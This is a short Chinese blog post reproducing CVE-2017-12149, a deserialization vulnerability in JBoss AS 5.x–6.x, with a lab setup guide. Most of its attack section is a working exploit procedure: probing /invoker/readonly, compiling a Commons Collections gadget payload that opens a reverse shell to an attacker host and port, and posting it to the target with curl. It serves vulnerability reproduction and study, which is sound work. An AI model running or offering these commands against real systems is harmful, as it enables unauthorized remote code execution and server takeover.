JBOOS反序列化漏洞复现(CVE-2017-12149)
2017-12-15 本文已影响171人
ch3ckr
漏洞范围:
JBossAS 5.x~6.x
漏洞成因:
该漏洞存在于JBoss AS的HttpInvoker 组件中的ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
测试目录是否存在:
检测invoker/readonly目录是否存在,若返回500 一般就是漏洞存在。
![](https://img.haomeiwen.com/i1258400/dee48c019b5c73c2.png)
工具检测:
工具一:链接-反弹shell
1.使用vps监听一个端口
![](https://img.haomeiwen.com/i1258400/6cace37d028ed465.png)
2.进入验证工具目录下执行以下程序,生成一个ReverseShellCommonsCollectionsHashMap.ser文件
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap attackip:attackport
3.将其发送到目标jboss的/invoker/readonly
curl http://targetip:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
4.执行完上述命令后会返回到vps一个shell
![](https://img.haomeiwen.com/i1258400/2587d4c15f2ca5a3.png)
工具二:链接-执行命令
![](https://img.haomeiwen.com/i1258400/746794be984542e7.png)
环境搭建:
1.下载 JBOSS 环境,并解压.
http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip
2.修改配置文件,使网络中的主机都能访问 JBOSS
具体位置:/jboss-6.1.0.Final/server/default/deploy/jbossweb.sar/server.xml
![](https://img.haomeiwen.com/i1258400/434b18329bbfcb45.png)
3.启动JBOSS
./jboss-6.1.0.Final/bin/run.sh
4.安装完成:
![](https://img.haomeiwen.com/i1258400/8978906c89a4d42f.png)